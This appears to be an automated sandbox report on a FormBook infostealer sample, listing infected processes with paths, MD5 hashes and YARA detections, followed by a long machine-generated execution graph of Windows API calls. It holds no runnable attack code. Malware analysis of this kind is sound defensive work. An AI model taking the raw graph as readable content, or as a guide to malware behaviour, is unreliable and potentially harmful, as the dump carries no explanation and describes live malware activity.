                                              Path:C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe"
                                              Imagebase:0x8c0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:5
                                              Start time:14:09:13
                                              Start date:10/01/2025
                                              Path:C:\Windows\SysWOW64\newdev.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\newdev.exe"
                                              Imagebase:0x330000
                                              File size:67'584 bytes
                                              MD5 hash:4C2EACBE19E43DCEC83534AE1A8738B8
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:moderate
                                              Has exited:false

                                              Target ID:7
                                              Start time:14:09:33
                                              Start date:10/01/2025
                                              Path:C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe"
                                              Imagebase:0x8c0000
                                              File size:140'800 bytes
                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:high
                                              Has exited:false

                                              Target ID:9
                                              Start time:14:09:45
                                              Start date:10/01/2025
                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                              Imagebase:0x7ff728280000
                                              File size:676'768 bytes
                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:3.2%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:7.7%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:138
                                                execution_graph 104049 1995658 104063 19932a8 104049->104063 104051 1995734 104066 1995548 104051->104066 104069 1996758 GetPEB 104063->104069 104065 1993933 104065->104051 104067 1995551 Sleep 104066->104067 104068 199555f 104067->104068 104070 1996782 104069->104070 104070->104065 104071 fc416f 104075 fd5fe6 104071->104075 104073 fc417a 104074 fd5fe6 85 API calls 104073->104074 104074->104073 104076 fd5ff3 104075->104076 104082 fd6020 104075->104082 104077 fd6022 104076->104077 104079 fd6027 104076->104079 104076->104082 104084 fd601a 104076->104084 104114 f89328 84 API calls Mailbox 104077->104114 104086 f89837 104079->104086 104082->104073 104113 f895a0 59 API calls _wcsstr 104084->104113 104087 f8984b 104086->104087 104088 f89851 104086->104088 104104 f87b2e 104087->104104 104089 fbf5d3 __i64tow 104088->104089 104090 f89899 104088->104090 104091 f89857 __itow 104088->104091 104095 fbf4da 104088->104095 104129 fa3698 83 API calls 2 library calls 104090->104129 104115 fa0db6 104091->104115 104097 fa0db6 Mailbox 59 API calls 104095->104097 104099 fbf552 Mailbox _wcscpy 104095->104099 104096 f89871 104096->104087 104125 f87de1 104096->104125 104100 fbf51f 104097->104100 104130 fa3698 83 API calls 2 library calls 104099->104130 104101 fa0db6 Mailbox 59 API calls 104100->104101 104102 fbf545 104101->104102 104102->104099 104103 f87de1 59 API calls 104102->104103 104103->104099 104105 fbec6b 104104->104105 104106 f87b40 104104->104106 104165 fd7bdb 59 API calls _memmove 104105->104165 104159 f87a51 104106->104159 104109 f87b4c 104109->104082 104110 fbec75 104166 f88047 104110->104166 104112 fbec7d Mailbox 104113->104082 104114->104079 104118 fa0dbe 104115->104118 104117 fa0dd8 104117->104096 104118->104117 104120 fa0ddc std::exception::exception 104118->104120 104131 fa571c 104118->104131 104148 fa33a1 DecodePointer 104118->104148 104149 fa859b RaiseException 104120->104149 104122 fa0e06 104150 fa84d1 58 API calls _free 104122->104150 104124 fa0e18 104124->104096 104126 f87df0 __wsetenvp _memmove 104125->104126 104127 fa0db6 Mailbox 59 API calls 104126->104127 104128 f87e2e 104127->104128 104128->104087 104129->104091 104130->104089 104132 fa5797 104131->104132 104137 fa5728 104131->104137 104157 fa33a1 DecodePointer 104132->104157 104134 fa5733 104134->104137 104151 faa16b 58 API calls 2 library calls 104134->104151 104152 faa1c8 58 API calls 8 library calls 104134->104152 104153 fa309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104134->104153 104135 fa579d 104158 fa8b28 58 API calls __getptd_noexit 104135->104158 104137->104134 104139 fa575b RtlAllocateHeap 104137->104139 104142 fa5783 104137->104142 104146 fa5781 104137->104146 104154 fa33a1 DecodePointer 104137->104154 104139->104137 104140 fa578f 104139->104140 104140->104118 104155 fa8b28 58 API calls __getptd_noexit 104142->104155 104156 fa8b28 58 API calls __getptd_noexit 104146->104156 104148->104118 104149->104122 104150->104124 104151->104134 104152->104134 104154->104137 104155->104146 104156->104140 104157->104135 104158->104140 104160 f87a85 _memmove 104159->104160 104161 f87a5f 104159->104161 104160->104109 104160->104160 104161->104160 104162 fa0db6 Mailbox 59 API calls 104161->104162 104163 f87ad4 104162->104163 104164 fa0db6 Mailbox 59 API calls 104163->104164 104164->104160 104165->104110 104167 f8805a 104166->104167 104168 f88052 104166->104168 104167->104112 104170 f87f77 59 API calls 2 library calls 104168->104170 104170->104167 104171 fe8d0d 104172 fe8d1a 104171->104172 104173 fe8d20 104171->104173 104174 fa2d55 _free 58 API calls 104172->104174 104176 fe8d31 104173->104176 104179 fa2d55 104173->104179 104174->104173 104177 fe8d43 104176->104177 104178 fa2d55 _free 58 API calls 104176->104178 104178->104177 104180 fa2d87 _free 104179->104180 104181 fa2d5e RtlFreeHeap 104179->104181 104180->104176 104181->104180 104182 fa2d73 104181->104182 104185 fa8b28 58 API calls __getptd_noexit 104182->104185 104184 fa2d79 GetLastError 104184->104180 104185->104184 104186 f8107d 104191 f8708b 104186->104191 104188 f8108c 104222 fa2d40 104188->104222 104192 f8709b __write_nolock 104191->104192 104225 f87667 104192->104225 104196 f8715a 104237 fa050b 104196->104237 104203 f87667 59 API calls 104204 f8718b 104203->104204 104256 f87d8c 104204->104256 104206 f87194 RegOpenKeyExW 104207 fbe8b1 RegQueryValueExW 104206->104207 104211 f871b6 Mailbox 104206->104211 104208 fbe8ce 104207->104208 104209 fbe943 RegCloseKey 104207->104209 104210 fa0db6 Mailbox 59 API calls 104208->104210 104209->104211 104221 fbe955 _wcscat Mailbox __wsetenvp 104209->104221 104212 fbe8e7 104210->104212 104211->104188 104260 f8522e 104212->104260 104213 f879f2 59 API calls 104213->104221 104216 fbe90f 104263 f87bcc 104216->104263 104218 fbe929 104218->104209 104219 f87de1 59 API calls 104219->104221 104220 f83f74 59 API calls 104220->104221 104221->104211 104221->104213 104221->104219 104221->104220 104305 fa2c44 104222->104305 104224 f81096 104226 fa0db6 Mailbox 59 API calls 104225->104226 104227 f87688 104226->104227 104228 fa0db6 Mailbox 59 API calls 104227->104228 104229 f87151 104228->104229 104230 f84706 104229->104230 104272 fb1940 104230->104272 104233 f87de1 59 API calls 104234 f84739 104233->104234 104274 f84750 104234->104274 104236 f84743 Mailbox 104236->104196 104238 fb1940 __write_nolock 104237->104238 104239 fa0518 GetFullPathNameW 104238->104239 104240 fa053a 104239->104240 104241 f87bcc 59 API calls 104240->104241 104242 f87165 104241->104242 104243 f87cab 104242->104243 104244 fbed4a 104243->104244 104245 f87cbf 104243->104245 104301 f88029 104244->104301 104296 f87c50 104245->104296 104248 f87173 104250 f83f74 104248->104250 104249 fbed55 __wsetenvp _memmove 104251 f83f82 104250->104251 104255 f83fa4 _memmove 104250->104255 104254 fa0db6 Mailbox 59 API calls 104251->104254 104252 fa0db6 Mailbox 59 API calls 104253 f83fb8 104252->104253 104253->104203 104254->104255 104255->104252 104257 f87d99 104256->104257 104258 f87da6 104256->104258 104257->104206 104259 fa0db6 Mailbox 59 API calls 104258->104259 104259->104257 104261 fa0db6 Mailbox 59 API calls 104260->104261 104262 f85240 RegQueryValueExW 104261->104262 104262->104216 104262->104218 104264 f87bd8 __wsetenvp 104263->104264 104265 f87c45 104263->104265 104267 f87bee 104264->104267 104268 f87c13 104264->104268 104266 f87d2c 59 API calls 104265->104266 104271 f87bf6 _memmove 104266->104271 104304 f87f27 59 API calls Mailbox 104267->104304 104270 f88029 59 API calls 104268->104270 104270->104271 104271->104218 104273 f84713 GetModuleFileNameW 104272->104273 104273->104233 104275 fb1940 __write_nolock 104274->104275 104276 f8475d GetFullPathNameW 104275->104276 104277 f84799 104276->104277 104278 f8477c 104276->104278 104280 f87d8c 59 API calls 104277->104280 104279 f87bcc 59 API calls 104278->104279 104281 f84788 104279->104281 104280->104281 104284 f87726 104281->104284 104285 f87734 104284->104285 104288 f87d2c 104285->104288 104287 f84794 104287->104236 104289 f87d3a 104288->104289 104290 f87d43 _memmove 104288->104290 104289->104290 104292 f87e4f 104289->104292 104290->104287 104293 f87e62 104292->104293 104295 f87e5f _memmove 104292->104295 104294 fa0db6 Mailbox 59 API calls 104293->104294 104294->104295 104295->104290 104297 f87c5f __wsetenvp 104296->104297 104298 f88029 59 API calls 104297->104298 104299 f87c70 _memmove 104297->104299 104300 fbed07 _memmove 104298->104300 104299->104248 104302 fa0db6 Mailbox 59 API calls 104301->104302 104303 f88033 104302->104303 104303->104249 104304->104271 104306 fa2c50 __tzset_nolock 104305->104306 104313 fa3217 104306->104313 104312 fa2c77 __tzset_nolock 104312->104224 104330 fa9c0b 104313->104330 104315 fa2c59 104316 fa2c88 DecodePointer DecodePointer 104315->104316 104317 fa2c65 104316->104317 104318 fa2cb5 104316->104318 104327 fa2c82 104317->104327 104318->104317 104369 fa87a4 59 API calls __woutput_l 104318->104369 104320 fa2d18 EncodePointer EncodePointer 104320->104317 104321 fa2cec 104321->104317 104325 fa2d06 EncodePointer 104321->104325 104371 fa8864 61 API calls 2 library calls 104321->104371 104322 fa2cc7 104322->104320 104322->104321 104370 fa8864 61 API calls 2 library calls 104322->104370 104325->104320 104326 fa2d00 104326->104317 104326->104325 104372 fa3220 104327->104372 104331 fa9c2f EnterCriticalSection 104330->104331 104332 fa9c1c 104330->104332 104331->104315 104337 fa9c93 104332->104337 104334 fa9c22 104334->104331 104361 fa30b5 58 API calls 3 library calls 104334->104361 104338 fa9c9f __tzset_nolock 104337->104338 104339 fa9ca8 104338->104339 104340 fa9cc0 104338->104340 104362 faa16b 58 API calls 2 library calls 104339->104362 104349 fa9ce1 __tzset_nolock 104340->104349 104365 fa881d 58 API calls 2 library calls 104340->104365 104342 fa9cad 104363 faa1c8 58 API calls 8 library calls 104342->104363 104345 fa9cd5 104347 fa9ceb 104345->104347 104348 fa9cdc 104345->104348 104346 fa9cb4 104364 fa309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104346->104364 104350 fa9c0b __lock 58 API calls 104347->104350 104366 fa8b28 58 API calls __getptd_noexit 104348->104366 104349->104334 104353 fa9cf2 104350->104353 104355 fa9cff 104353->104355 104356 fa9d17 104353->104356 104367 fa9e2b InitializeCriticalSectionAndSpinCount 104355->104367 104358 fa2d55 _free 58 API calls 104356->104358 104359 fa9d0b 104358->104359 104368 fa9d33 LeaveCriticalSection _doexit 104359->104368 104362->104342 104363->104346 104365->104345 104366->104349 104367->104359 104368->104349 104369->104322 104370->104321 104371->104326 104375 fa9d75 LeaveCriticalSection 104372->104375 104374 fa2c87 104374->104312 104375->104374 104376 fbfdfc 104393 f8ab30 Mailbox _memmove 104376->104393 104380 f8b525 104463 fe9e4a 89 API calls 4 library calls 104380->104463 104383 fc09e5 104469 fe9e4a 89 API calls 4 library calls 104383->104469 104384 fc0055 104462 fe9e4a 89 API calls 4 library calls 104384->104462 104385 f89f37 Mailbox 104385->104384 104386 f8a057 104385->104386 104387 f8b47a 104385->104387 104391 f8b475 104385->104391 104392 fa0db6 59 API calls Mailbox 104385->104392 104399 f88047 59 API calls 104385->104399 104400 f87667 59 API calls 104385->104400 104401 fd6e8f 59 API calls 104385->104401 104402 fa2d40 67 API calls __cinit 104385->104402 104404 fc09d6 104385->104404 104406 f8a55a 104385->104406 104427 f8c8c0 341 API calls 2 library calls 104385->104427 104428 f8b900 60 API calls Mailbox 104385->104428 104387->104383 104387->104384 104397 f88047 59 API calls 104391->104397 104392->104385 104393->104380 104393->104385 104393->104386 104403 f87de1 59 API calls 104393->104403 104409 f8b2b6 104393->104409 104412 fc086a 104393->104412 104414 fc0878 104393->104414 104416 fc085c 104393->104416 104417 f8b21c 104393->104417 104419 fa0db6 59 API calls Mailbox 104393->104419 104422 fd6e8f 59 API calls 104393->104422 104424 ffdf23 104393->104424 104429 f89ea0 104393->104429 104453 f89c90 59 API calls Mailbox 104393->104453 104457 ffc193 85 API calls 2 library calls 104393->104457 104458 ffc2e0 96 API calls Mailbox 104393->104458 104459 fe7956 59 API calls Mailbox 104393->104459 104460 ffbc6b 341 API calls Mailbox 104393->104460 104461 fd617e 59 API calls Mailbox 104393->104461 104394 fc0064 104397->104386 104399->104385 104400->104385 104401->104385 104402->104385 104403->104393 104468 fe9e4a 89 API calls 4 library calls 104404->104468 104467 fe9e4a 89 API calls 4 library calls 104406->104467 104456 f8f6a3 341 API calls 104409->104456 104465 f89c90 59 API calls Mailbox 104412->104465 104466 fe9e4a 89 API calls 4 library calls 104414->104466 104416->104386 104464 fd617e 59 API calls Mailbox 104416->104464 104454 f89d3c 60 API calls Mailbox 104417->104454 104419->104393 104420 f8b22d 104455 f89d3c 60 API calls Mailbox 104420->104455 104422->104393 104470 ffcadd 104424->104470 104426 ffdf33 104426->104393 104427->104385 104428->104385 104430 f89ebf 104429->104430 104448 f89eed Mailbox 104429->104448 104431 fa0db6 Mailbox 59 API calls 104430->104431 104431->104448 104432 fa2d40 67 API calls __cinit 104432->104448 104433 f8b475 104434 f88047 59 API calls 104433->104434 104447 f8a057 104434->104447 104435 f8b47a 104436 fc0055 104435->104436 104452 fc09e5 104435->104452 104597 fe9e4a 89 API calls 4 library calls 104436->104597 104438 fa0db6 59 API calls Mailbox 104438->104448 104441 fc0064 104441->104393 104444 f88047 59 API calls 104444->104448 104445 f87667 59 API calls 104445->104448 104446 fd6e8f 59 API calls 104446->104448 104447->104393 104448->104432 104448->104433 104448->104435 104448->104436 104448->104438 104448->104444 104448->104445 104448->104446 104448->104447 104449 fc09d6 104448->104449 104451 f8a55a 104448->104451 104595 f8c8c0 341 API calls 2 library calls 104448->104595 104596 f8b900 60 API calls Mailbox 104448->104596 104599 fe9e4a 89 API calls 4 library calls 104449->104599 104598 fe9e4a 89 API calls 4 library calls 104451->104598 104600 fe9e4a 89 API calls 4 library calls 104452->104600 104453->104393 104454->104420 104455->104409 104456->104380 104457->104393 104458->104393 104459->104393 104460->104393 104461->104393 104462->104394 104463->104416 104464->104386 104465->104416 104466->104416 104467->104386 104468->104383 104469->104386 104471 f89837 84 API calls 104470->104471 104472 ffcb1a 104471->104472 104477 ffcb61 Mailbox 104472->104477 104508 ffd7a5 104472->104508 104474 ffcbb2 Mailbox 104474->104477 104481 f89837 84 API calls 104474->104481 104495 ffcdb9 104474->104495 104540 fffbce 59 API calls 2 library calls 104474->104540 104541 ffcfdf 61 API calls 2 library calls 104474->104541 104475 ffcf2e 104558 ffd8c8 92 API calls Mailbox 104475->104558 104477->104426 104479 ffcf3d 104480 ffcdc7 104479->104480 104482 ffcf49 104479->104482 104521 ffc96e 104480->104521 104481->104474 104482->104477 104487 ffce00 104536 fa0c08 104487->104536 104490 ffce1a 104542 fe9e4a 89 API calls 4 library calls 104490->104542 104491 ffce33 104543 f892ce 104491->104543 104494 ffce25 GetCurrentProcess TerminateProcess 104494->104491 104495->104475 104495->104480 104500 ffcfa4 104500->104477 104503 ffcfb8 FreeLibrary 104500->104503 104501 ffce6b 104555 ffd649 107 API calls _free 104501->104555 104503->104477 104507 ffce7c 104507->104500 104556 f88d40 59 API calls Mailbox 104507->104556 104557 f89d3c 60 API calls Mailbox 104507->104557 104559 ffd649 107 API calls _free 104507->104559 104509 f87e4f 59 API calls 104508->104509 104510 ffd7c0 CharLowerBuffW 104509->104510 104560 fdf167 104510->104560 104514 f87667 59 API calls 104515 ffd7f9 104514->104515 104567 f8784b 104515->104567 104517 ffd810 104519 f87d2c 59 API calls 104517->104519 104518 ffd858 Mailbox 104518->104474 104520 ffd81c Mailbox 104519->104520 104520->104518 104580 ffcfdf 61 API calls 2 library calls 104520->104580 104522 ffc989 104521->104522 104523 ffc9de 104521->104523 104524 fa0db6 Mailbox 59 API calls 104522->104524 104527 ffda50 104523->104527 104526 ffc9ab 104524->104526 104525 fa0db6 Mailbox 59 API calls 104525->104526 104526->104523 104526->104525 104528 ffdc79 Mailbox 104527->104528 104534 ffda73 _strcat _wcscpy __wsetenvp 104527->104534 104528->104487 104529 f89b3c 59 API calls 104529->104534 104530 f89b98 59 API calls 104530->104534 104531 f89be6 59 API calls 104531->104534 104532 f89837 84 API calls 104532->104534 104533 fa571c 58 API calls std::exception::_Copy_str 104533->104534 104534->104528 104534->104529 104534->104530 104534->104531 104534->104532 104534->104533 104584 fe5887 61 API calls 2 library calls 104534->104584 104537 fa0c1d 104536->104537 104538 fa0cb5 VirtualProtect 104537->104538 104539 fa0c83 104537->104539 104538->104539 104539->104490 104539->104491 104540->104474 104541->104474 104542->104494 104544 f892d6 104543->104544 104545 fa0db6 Mailbox 59 API calls 104544->104545 104546 f892e4 104545->104546 104547 f892f0 104546->104547 104585 f891fc 59 API calls Mailbox 104546->104585 104549 f89050 104547->104549 104586 f89160 104549->104586 104551 fa0db6 Mailbox 59 API calls 104552 f890fb 104551->104552 104552->104507 104554 f88d40 59 API calls Mailbox 104552->104554 104553 f8905f 104553->104551 104553->104552 104554->104501 104555->104507 104556->104507 104557->104507 104558->104479 104559->104507 104562 fdf192 __wsetenvp 104560->104562 104561 fdf1d1 104561->104514 104561->104520 104562->104561 104563 fdf1c7 104562->104563 104566 fdf278 104562->104566 104563->104561 104581 f878c4 61 API calls 104563->104581 104566->104561 104582 f878c4 61 API calls 104566->104582 104568 f8785a 104567->104568 104569 f878b7 104567->104569 104568->104569 104571 f87865 104568->104571 104570 f87d2c 59 API calls 104569->104570 104576 f87888 _memmove 104570->104576 104572 fbeb09 104571->104572 104573 f87880 104571->104573 104575 f88029 59 API calls 104572->104575 104583 f87f27 59 API calls Mailbox 104573->104583 104577 fbeb13 104575->104577 104576->104517 104578 fa0db6 Mailbox 59 API calls 104577->104578 104579 fbeb33 104578->104579 104580->104518 104581->104563 104582->104566 104583->104576 104584->104534 104585->104547 104587 f89169 Mailbox 104586->104587 104588 fbf19f 104587->104588 104593 f89173 104587->104593 104589 fa0db6 Mailbox 59 API calls 104588->104589 104591 fbf1ab 104589->104591 104590 f8917a 104590->104553 104593->104590 104594 f89c90 59 API calls Mailbox 104593->104594 104594->104593 104595->104448 104596->104448 104597->104441 104598->104447 104599->104452 104600->104447 104601 f83633 104602 f8366a 104601->104602 104603 f83688 104602->104603 104604 f836e7 104602->104604 104645 f836e5 104602->104645 104608 f8374b PostQuitMessage 104603->104608 104609 f83695 104603->104609 104606 f836ed 104604->104606 104607 fbd0cc 104604->104607 104605 f836ca DefWindowProcW 104610 f836d8 104605->104610 104611 f836f2 104606->104611 104612 f83715 SetTimer RegisterWindowMessageW 104606->104612 104650 f91070 10 API calls Mailbox 104607->104650 104608->104610 104614 f836a0 104609->104614 104615 fbd154 104609->104615 104617 f836f9 KillTimer 104611->104617 104618 fbd06f 104611->104618 104612->104610 104620 f8373e CreatePopupMenu 104612->104620 104621 f836a8 104614->104621 104622 f83755 104614->104622 104666 fe2527 71 API calls _memset 104615->104666 104646 f8443a Shell_NotifyIconW _memset 104617->104646 104627 fbd0a8 MoveWindow 104618->104627 104628 fbd074 104618->104628 104619 fbd0f3 104651 f91093 341 API calls Mailbox 104619->104651 104620->104610 104623 fbd139 104621->104623 104624 f836b3 104621->104624 104648 f844a0 64 API calls _memset 104622->104648 104623->104605 104665 fd7c36 59 API calls Mailbox 104623->104665 104631 f836be 104624->104631 104632 fbd124 104624->104632 104625 fbd166 104625->104605 104625->104610 104627->104610 104634 fbd078 104628->104634 104635 fbd097 SetFocus 104628->104635 104631->104605 104652 f8443a Shell_NotifyIconW _memset 104631->104652 104664 fe2d36 81 API calls _memset 104632->104664 104633 f83764 104633->104610 104634->104631 104637 fbd081 104634->104637 104635->104610 104636 f8370c 104647 f83114 DeleteObject DestroyWindow Mailbox 104636->104647 104649 f91070 10 API calls Mailbox 104637->104649 104643 fbd118 104653 f8434a 104643->104653 104645->104605 104646->104636 104647->104610 104648->104633 104649->104610 104650->104619 104651->104631 104652->104643 104654 f84375 _memset 104653->104654 104667 f84182 104654->104667 104658 f84430 Shell_NotifyIconW 104660 f84422 104658->104660 104659 f84414 Shell_NotifyIconW 104659->104660 104671 f8407c 104660->104671 104662 f843fa 104662->104658 104662->104659 104663 f84429 104663->104645 104664->104633 104665->104645 104666->104625 104668 fbd423 104667->104668 104669 f84196 104667->104669 104668->104669 104670 fbd42c DestroyIcon 104668->104670 104669->104662 104693 fe2f94 62 API calls _W_store_winword 104669->104693 104670->104669 104672 f84098 104671->104672 104692 f8416f Mailbox 104671->104692 104694 f87a16 104672->104694 104675 fbd3c8 LoadStringW 104679 fbd3e2 104675->104679 104676 f840b3 104677 f87bcc 59 API calls 104676->104677 104678 f840c8 104677->104678 104678->104679 104680 f840d9 104678->104680 104681 f87b2e 59 API calls 104679->104681 104682 f840e3 104680->104682 104683 f84174 104680->104683 104686 fbd3ec 104681->104686 104685 f87b2e 59 API calls 104682->104685 104684 f88047 59 API calls 104683->104684 104688 f840ed _memset _wcscpy 104684->104688 104685->104688 104687 f87cab 59 API calls 104686->104687 104686->104688 104689 fbd40e 104687->104689 104690 f84155 Shell_NotifyIconW 104688->104690 104691 f87cab 59 API calls 104689->104691 104690->104692 104691->104688 104692->104663 104693->104662 104695 fa0db6 Mailbox 59 API calls 104694->104695 104696 f87a3b 104695->104696 104697 f88029 59 API calls 104696->104697 104698 f840a6 104697->104698 104698->104675 104698->104676 104699 fa7c56 104700 fa7c62 __tzset_nolock 104699->104700 104736 fa9e08 GetStartupInfoW 104700->104736 104703 fa7c67 104738 fa8b7c GetProcessHeap 104703->104738 104704 fa7cbf 104705 fa7cca 104704->104705 104821 fa7da6 58 API calls 3 library calls 104704->104821 104739 fa9ae6 104705->104739 104708 fa7cd0 104709 fa7cdb __RTC_Initialize 104708->104709 104822 fa7da6 58 API calls 3 library calls 104708->104822 104760 fad5d2 104709->104760 104712 fa7cea 104713 fa7cf6 GetCommandLineW 104712->104713 104823 fa7da6 58 API calls 3 library calls 104712->104823 104779 fb4f23 GetEnvironmentStringsW 104713->104779 104716 fa7cf5 104716->104713 104719 fa7d10 104720 fa7d1b 104719->104720 104824 fa30b5 58 API calls 3 library calls 104719->104824 104789 fb4d58 104720->104789 104723 fa7d21 104724 fa7d2c 104723->104724 104825 fa30b5 58 API calls 3 library calls 104723->104825 104803 fa30ef 104724->104803 104727 fa7d34 104728 fa7d3f __wwincmdln 104727->104728 104826 fa30b5 58 API calls 3 library calls 104727->104826 104809 f847d0 104728->104809 104731 fa7d53 104732 fa7d62 104731->104732 104827 fa3358 58 API calls _doexit 104731->104827 104828 fa30e0 58 API calls _doexit 104732->104828 104735 fa7d67 __tzset_nolock 104737 fa9e1e 104736->104737 104737->104703 104738->104704 104829 fa3187 36 API calls 2 library calls 104739->104829 104741 fa9aeb 104830 fa9d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 104741->104830 104743 fa9af0 104744 fa9af4 104743->104744 104832 fa9d8a TlsAlloc 104743->104832 104831 fa9b5c 61 API calls 2 library calls 104744->104831 104747 fa9af9 104747->104708 104748 fa9b06 104748->104744 104749 fa9b11 104748->104749 104833 fa87d5 104749->104833 104752 fa9b53 104841 fa9b5c 61 API calls 2 library calls 104752->104841 104755 fa9b32 104755->104752 104757 fa9b38 104755->104757 104756 fa9b58 104756->104708 104840 fa9a33 58 API calls 4 library calls 104757->104840 104759 fa9b40 GetCurrentThreadId 104759->104708 104761 fad5de __tzset_nolock 104760->104761 104762 fa9c0b __lock 58 API calls 104761->104762 104763 fad5e5 104762->104763 104764 fa87d5 __calloc_crt 58 API calls 104763->104764 104765 fad5f6 104764->104765 104766 fad661 GetStartupInfoW 104765->104766 104767 fad601 __tzset_nolock @_EH4_CallFilterFunc@8 104765->104767 104773 fad676 104766->104773 104776 fad7a5 104766->104776 104767->104712 104768 fad86d 104855 fad87d LeaveCriticalSection _doexit 104768->104855 104770 fa87d5 __calloc_crt 58 API calls 104770->104773 104771 fad7f2 GetStdHandle 104771->104776 104772 fad805 GetFileType 104772->104776 104773->104770 104775 fad6c4 104773->104775 104773->104776 104774 fad6f8 GetFileType 104774->104775 104775->104774 104775->104776 104853 fa9e2b InitializeCriticalSectionAndSpinCount 104775->104853 104776->104768 104776->104771 104776->104772 104854 fa9e2b InitializeCriticalSectionAndSpinCount 104776->104854 104780 fa7d06 104779->104780 104781 fb4f34 104779->104781 104785 fb4b1b GetModuleFileNameW 104780->104785 104856 fa881d 58 API calls 2 library calls 104781->104856 104783 fb4f5a _memmove 104784 fb4f70 FreeEnvironmentStringsW 104783->104784 104784->104780 104786 fb4b4f _wparse_cmdline 104785->104786 104788 fb4b8f _wparse_cmdline 104786->104788 104857 fa881d 58 API calls 2 library calls 104786->104857 104788->104719 104790 fb4d69 104789->104790 104791 fb4d71 __wsetenvp 104789->104791 104790->104723 104792 fa87d5 __calloc_crt 58 API calls 104791->104792 104799 fb4d9a __wsetenvp 104792->104799 104793 fb4df1 104794 fa2d55 _free 58 API calls 104793->104794 104794->104790 104795 fa87d5 __calloc_crt 58 API calls 104795->104799 104796 fb4e16 104798 fa2d55 _free 58 API calls 104796->104798 104798->104790 104799->104790 104799->104793 104799->104795 104799->104796 104800 fb4e2d 104799->104800 104858 fb4607 58 API calls __woutput_l 104799->104858 104859 fa8dc6 IsProcessorFeaturePresent 104800->104859 104802 fb4e39 104802->104723 104805 fa30fb __IsNonwritableInCurrentImage 104803->104805 104882 faa4d1 104805->104882 104806 fa3119 __initterm_e 104807 fa2d40 __cinit 67 API calls 104806->104807 104808 fa3138 __cinit __IsNonwritableInCurrentImage 104806->104808 104807->104808 104808->104727 104810 f847ea 104809->104810 104820 f84889 104809->104820 104811 f84824 IsThemeActive 104810->104811 104885 fa336c 104811->104885 104815 f84850 104897 f848fd SystemParametersInfoW SystemParametersInfoW 104815->104897 104817 f8485c 104898 f83b3a 104817->104898 104819 f84864 SystemParametersInfoW 104819->104820 104820->104731 104821->104705 104822->104709 104823->104716 104827->104732 104828->104735 104829->104741 104830->104743 104831->104747 104832->104748 104835 fa87dc 104833->104835 104836 fa8817 104835->104836 104838 fa87fa 104835->104838 104842 fb51f6 104835->104842 104836->104752 104839 fa9de6 TlsSetValue 104836->104839 104838->104835 104838->104836 104850 faa132 Sleep 104838->104850 104839->104755 104840->104759 104841->104756 104843 fb5201 104842->104843 104845 fb521c 104842->104845 104844 fb520d 104843->104844 104843->104845 104851 fa8b28 58 API calls __getptd_noexit 104844->104851 104847 fb522c HeapAlloc 104845->104847 104848 fb5212 104845->104848 104852 fa33a1 DecodePointer 